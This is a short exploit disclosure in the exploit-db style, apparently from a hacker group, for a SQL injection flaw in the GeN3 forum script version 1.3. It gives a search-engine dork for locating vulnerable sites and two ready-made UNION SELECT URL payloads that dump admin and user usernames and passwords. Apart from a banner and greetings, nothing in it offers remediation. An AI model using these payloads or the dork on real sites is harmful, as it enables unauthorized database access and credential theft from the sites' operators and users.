view source print? # Author: Dr.0rYX & Cr3w-DZ # Software Link: http://www.ptcpay.com/shop/browse_products.php ############################### NN N AAAAAA SSSSSSSSS NNN N A A S N NN N A A S N NN N A A S TTTTTT EEEEE AAAA MM MM N NN N AAAAAAAA SSSSSSSSS TT E A A M M M M N NN N A A S TT E A A M M M N NN N A A S TT EEEE AAAAAA M M N NNN A A S TT E A A M M N NN A A S TT E A A M M N N A A SSSSSSSSS TT EEEEE A A M M ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] GeN3 forum V1.3 SQL injection vulnerability [!] Author : Dr.0rYX & Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.ptcpay.com [+] script : GeN3 Version 1.3 [+] Download : http://www.ptcpay.com/shop/browse_products.php [+] Version() : 1.3 [+] Vulnerability : SQL injection [+] Dork :inurl:"main_forum.php?cat=" **************************************************************************/ [ Vulnerable File ] http://server/path/main_forum.php?cat=[N.A.S.T ] [ Exploit ] http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users-- [ GReet ] [+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS